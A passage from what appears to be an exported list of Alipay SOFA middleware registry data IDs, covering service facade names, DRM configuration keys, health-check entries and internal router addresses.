nfigDrm.borrowerMinIntRateForDayStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insriskdatasync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmSnapshotMsgSwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.UserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.l2cache.L2CacheClientSwitch.versionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_PUNISHCENTER_CACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.app.AppApiQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.SettlementNotificationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.taskcenter.TaskCenterQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbmaterialcenter.common.service.facade.api.material.MaterialPrincipalRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.marketdata.MarketDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbocenter.common.service.facade.OrderInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPENBIZMOCK#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProdSaleQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.consult.WkConsultService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.BizDataPullFacade:1.0:eindustrycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbarcenter.common.service.facade.ar.AgentChargeArFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fundboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsParamsDRMResource.maxYebSingleAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fploanmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BOPS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.punishcenter.common.service.facade.PunishStrategyLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-xianbeikoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo-test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.IterationJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apgauss.common.service.facade.api.InsightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.199.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.ext.payment.service.dback.ack.DbackAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishMaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:rating@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.apply.CreditCardLoanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityOrderManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:gzmsact-prempromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.IdeQueryServiceFacade:1.0:gmp-openplatform-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyfbi.core.service.messaging.MessageListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.amct.facade.CaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finbatch.comm.service.facade.mng.FinBatchManualService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.bank.SceneInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.246.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.241.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.playbackmng.playback.service.AssignedBizFeaturePlaybackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antsecscheduler.common.service.facade.BumngManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.tianxun.service.TxWhiteNameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.KeywordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ficcldc:name=com.alipay.zcbprod.common.service.facade.ldc.toggle.FacadeZoneSwitchDrm.switchRzBlackListsConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchbenefit.common.service.facade.mng.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductSearchQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.LoginProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcinstdata#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.common.service.facade.xspace.XSpaceItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.route.RouteNewLinkManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.gotone.SendSmsServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:signatureRemoveService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.BillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finboss.common.service.facade.yeb.YebUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkassetmore.common.service.facade.api.DistributeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CustomPrizeTypeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.signature.SignatureUtilFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:hello@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.144.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkassetmore.common.service.facade.api.OrgServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.InstSpAccountAuthRZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.12.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmpservice.common.service.facade.promox.PromoxCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgopen.common.service.facade.insurance.InsuranceDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoaftermarket.common.service.common.AutoServiceInspectCarFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableAviatorEngine,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@creditgovernance#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.securitysimulate.common.service.facade.service.TestDataQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.TairToTbaseSwitch.switchToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.biz.permlimit.rest.RuleAndRulePkgRestSit#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.cifin_cifinDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alipaymember.common.service.facade.pointcert.MemberPointCertQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:replay-token@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.common.facade.MetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_zftCustomerExpensesAuditProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:benetnasch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.CreditStopCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.console.common.service.facade.DeleteCacheForTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iriskservice.common.service.model.probe.spi.RiskEventTraceProbeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opencore.service.facade.acl.AclResourceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.LiquidationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.cluster.ClusterOperationService:1.0:sigmaJenkinsClusterOperationServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoCompanyInfoFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.PriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pccontractprod.common.service.facade.api.template.TemplateAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.SealService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstmng.facade.api.whitelist.WhitelistPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BemcDomainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmng.common.service.facade.oss.OssClientManager:1.0:mngOssClientManagerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:cloudinc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.servicegovern.common.service.facade.FaultToleranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.ParamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.airprod_apayfundDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jvcore.common.facade.portfolio.PortfolioInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdtunical.common.service.facade.http.FlowServiceRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.routeclient.interfacename:certifyweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.184.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:messagefusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.ExpiredReconDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.commission.CommissionInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.fsc.facade.WorkerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.common.UsageAgreementSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyArchiveQueryInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.erra.rest.ErraRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.facade.ScorpioExportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.http.SceneSolutionQueryHttpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:commoncard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.ContactUserService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.DimensionAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifequality.common.facade.InsLifeRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EBPPPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.flab.facade.api.localfile.LocalFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.biz.graphclient.service.GraphRepositoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.dfriskmng.facade.DxFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.service.FeatureManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.GlobalSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.biz.shared.component.BatchWriteOffBillComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.mrchpunish.MrchPunishServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antlawEndReadCollbackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.172.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.vega.common.script.simpleel.service.TransformService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defincustomer.facade.api.member.MemberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.199.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.loadcenter.facade.LoadCenterCloudApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquirePayApplyCachedReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mservicesinspect@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.receipt.api.RefundReceiptService:1.0:tradecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ApiGroupServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.antg.facade.customer.AntRegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.channelspop.service.decision.opportunity.facade.OpportunityConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteUsageAgreementSignOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocontent.common.service.facade.api.ContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.topicspeech.api.TopicSpeechFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.reportengine.PermissionFacade:1.0:promocenterMerchantMarketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.DrmInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.withdraw.api.WithdrawQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.GroupFacade:1.0:iam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_MINITRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.adaptor.mobileops.MobileopsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_ALM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbprocess.common.service.facade.callback.ProcessCallback:1.0:applyOrderSendMessageHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.alarm.api.AlarmMetricMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.muac.api.facade.qdb.TrapGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.outside.traffic.TrafficPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.smartDeductMinAmountStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.ghrsSpecialProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.article.ArticleOrgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.survey.finedu.CsEntryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.api.SecurityAdvicePolicyService:1.0:${securitycore_vps_uniqueid}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.biz.tdc.task.TdcTaskEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkSettleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpPlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:mymdpflowonline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:cif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.service.facade.PepStabilityControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.acprodmngcore.cloudservice.facade.AccessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promoplaycenter.common.manage.facade.api.PlayTypeManageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.common.service.biz.ContractOperateBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.kb.MemberProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:pullBlockSplitor_abs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.indicator.MrmIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.callback.CheckCallback:1.0:kbservcenter_unifyCheckCallbackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.log.LogService:1.0:${version}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDepositMaxTotalLimitAmtProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.outflux.ComposeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.mng.recover.AtomRecoverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.otherControlDirection,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.common.service.facade.api.EinvStripFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.DetectTaskListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.api.PositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.180.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:antefi_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.RefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantCertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.facade.isp.ApiPackageDocSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.ability.RopAnalyzePropertyFacade:1.0:miniProgramInfosecResultImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.RulePublishOperateMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:appstore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.deploy.ArtifactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.SofitoActivityTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.order.v2.OrderFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:atd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.zpaas.zappinfo.core.service.transcation.TransactionLogConfigDrmResource.retry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-PCREDITMARKET-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.91.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwalm.facade.api.FmCashPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.28.137.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.closeProfiler,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:irisbizprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.176.76#